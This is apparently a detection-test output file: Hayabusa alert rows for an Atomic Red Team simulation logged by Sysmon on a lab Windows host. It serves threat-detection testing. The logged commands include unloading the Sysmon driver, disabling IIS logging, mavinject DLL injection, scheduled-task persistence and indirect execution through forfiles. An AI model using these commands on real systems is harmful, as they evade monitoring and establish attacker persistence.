+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00 | Hash: SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.600 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DA40-5D31-0000-0010E16B3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3976 | PGUID: 747F3D96-DA4A-5D31-0000-0010C21F3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1012 | PGUID: 747F3D96-DA4A-5D31-0000-0010EE223D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4056 | PGUID: 747F3D96-DA4A-5D31-0000-00106C293D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2584 | PGUID: 747F3D96-DA4A-5D31-0000-00107A2C3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll | Process: C:\Windows\System32\mavinject.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2604 | PGUID: 747F3D96-DA4B-5D31-0000-0010CB413D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,,MavInject Process Injection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-DA4C-5D31-0000-0010655D3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-DA4C-5D31-0000-001077603D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-DA68-5D31-0000-001025713E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DA6A-5D31-0000-0010B2953E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management AT | Cmd: at 13:20 /interactive cmd | Process: C:\Windows\System32\at.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | LID: 0x50951 | PID: 3864 | PGUID: 747F3D96-DA6A-5D31-0000-001004983E00 | Hash: SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,PrivEsc,Interactive AT Job,,../hayabusa-rules/sigma/process_creation/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3224 | PGUID: 747F3D96-DA6A-5D31-0000-0010C09D3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4276 | PGUID: 747F3D96-DA6A-5D31-0000-001072A63E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | LID: 0x50951 | PID: 1408 | PGUID: 747F3D96-DA6A-5D31-0000-0010C4A83E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.608 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\spawn | Process: C:\Windows\system32\svchost.exe | PID: 1108 | PGUID: 747F3D96-D4A5-5D31-0000-001037D40000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4552 | PGUID: 747F3D96-DA6A-5D31-0000-001025AD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-DA6A-5D31-0000-001074C23E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-DA6A-5D31-0000-0010C5C43E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-DA6A-5D31-0000-00104BC83E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5332 | PGUID: 747F3D96-DA6B-5D31-0000-0010CCD03E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a -c | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-DA6B-5D31-0000-00102DD33E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3316 | PGUID: 747F3D96-DA6E-5D31-0000-0010D8F63E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a Java | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | LID: 0x50951 | PID: 1284 | PGUID: 747F3D96-DA6E-5D31-0000-001081F93E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-DA70-5D31-0000-001007293F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a C:\Windows\system32\javacpl.cpl | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-DA70-5D31-0000-00100E2C3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6168 | PGUID: 747F3D96-DA71-5D31-0000-00101A463F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-DA72-5D31-0000-0010044F3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-DA72-5D31-0000-001056513F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x50951 | PID: 3160 | PGUID: 747F3D96-DA72-5D31-0000-0010B1543F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1052 | PGUID: 747F3D96-DA73-5D31-0000-00106A8D3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-DA73-5D31-0000-0010918F3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1724 | PGUID: 747F3D96-DA73-5D31-0000-001061933F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49734 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA1FA70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3496 | PGUID: 747F3D96-DD34-5D31-0000-0010FCC64800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-DD37-5D31-0000-00109D4C4900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\3ivx11ib\3ivx11ib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-DD8B-5D31-0000-001094584A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
